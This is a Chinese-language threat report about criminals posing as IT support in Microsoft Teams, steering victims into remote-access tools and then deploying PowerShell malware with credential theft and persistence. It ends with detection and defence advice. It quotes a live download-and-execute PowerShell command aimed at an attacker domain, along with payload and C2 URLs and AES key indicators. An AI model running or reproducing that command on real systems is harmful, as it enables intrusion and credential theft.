快速入口: Teams官网 | Teams下载 | Teams网页版登录
在企业安全领域出现了令人担忧的新动向:网络犯罪分子开始利用 Microsoft Teams——这一长期被信任的内部消息与协作工具——来投递基于 PowerShell 的恶意软件,从而获取对 Windows 系统的未经授权远程访问。
攻击者通过冒充 IT 支持人员并利用社会工程学手法,绕过传统的邮件过滤和网络防御,直接利用用户对日常协作平台的高度信任进行攻击。
自2017年上线以来,Microsoft Teams已成为全球组织不可或缺的工具,负责处理聊天、会议、文件共享等功能。如今,威胁行为者正借助其广泛普及性发起攻击。
攻击方式
1.攻击者会新建或入侵现有的 Teams 租户,并以 “IT SUPPORT”、“Help Desk” 或带有对勾表情的定制名称发起聊天或语音会话,以营造可信形象。
2.这些账户通常使用微软的 onmicrosoft.com 域名,以及诸如“admin”或“supportbotit”的通用前缀,显示其批量或自动化注册特征。
3.一旦受害者接受 Teams 会话(通常被包装成例行检查或维护电话),攻击者便会引导其安装远程访问工具,如 QuickAssist 或 AnyDesk。
4.借助这些合法工具,攻击者即可接管终端。
与早期关联 BlackBasta 勒索软件的攻击不同,那些攻击通常先通过大规模邮件投递,再辅以 Teams 跟进。而最新攻击有时完全跳过邮件环节,直接从 Teams 入手。这表明攻击可能来自多个威胁团伙,或其战术正在快速演变。
PowerShell恶意负载
在建立远程控制后,攻击者执行一条 PowerShell 命令来下载并运行恶意脚本:
powershell.exe -ExecutionPolicy Bypass -WindowsStyle Hidden -Command “Invoke-RestMethod -Uri https://audiorealteak.com/payload/build.ps1/iex"
该多阶段脚本具备凭据窃取、持久化、系统侦察及远程代码执行能力。
1.加密标识:脚本在早期使用硬编码的 AES 参数:
(1)$iv = “&9*zS7LY%ZN1thfI”
(2)$key = “123456789012345678901234r0hollah”
这些可帮助安全人员进行调查溯源。研究表明,其与 EncryptHub(又称 Water Gamayun 或 LARVA-208)团伙的过往脚本存在联系。
2.关键功能:
(1)创建全局互斥量 (mutex) 来确保单实例运行。
(2)编译并注入 C# 代码调用 RtlSetProcessIsCritical,将 PowerShell 标记为关键进程,终止时触发系统崩溃,增加响应难度。
(3)SystemInfo 函数收集主机信息(公网 IP、硬件 UUID、操作系统数据等),加密为 JSON 后回传至 C2 服务器。
(4)弹出原生的 Windows 凭据提示框,诱骗用户输入账号密码,保存至 AppData\info.txt。
(5)持久化:优先创建计划任务 “Google LLC Updater”,失败则退回至注册表 Run 键。
(6)下一阶段脚本从备用域名 https://cjhsbam[.]com/payload/runner.ps1 下载,增强抗封锁能力。
(7)所有C2通信使用上述硬编码 AES 参数加密,通过 https://audiorealtek[.]com/ 传输,并解密执行为 PowerShell 任务。
检测与防御
企业可借助 Permiso 内置检测规则,例如:
1.P0_M365_TEAMS_CHAT_CREATED_BY_SUSPICIOUS_EXTERNAL_USER_1
2.P0_M365_TEAMS_CHAT_MEMBER_NAME_SUSPICIOUS_CHARACTER_1
来识别可疑的 Teams 交互行为。
防御建议:
1.加强对外部聊天与语音呼叫的安全意识培训。
2.强制实施严格的租户允许/阻止列表策略。
3.持续监控 Teams 中异常账户的创建情况。
4.在PowerShell脚本中检测硬编码的加密参数及异常进程保护行为,以便尽早发现可疑活动。
随着威胁行为者不断转向协作平台,企业必须主动采取措施,才能在这一新兴攻击面上抢占防御先机。
延伸阅读 #
常见问题(FAQ) #
- 问:如何快速开始使用Teams? 答:通过“快速入口”完成下载/登录,创建团队与频道开始沟通与协作。
- 问:Teams支持哪些平台? 答:Windows、macOS、Android、iOS、Web全平台覆盖。
- 问:如何获取帮助与支持? 答:访问微软官方支持或查看站内“延伸阅读”文章。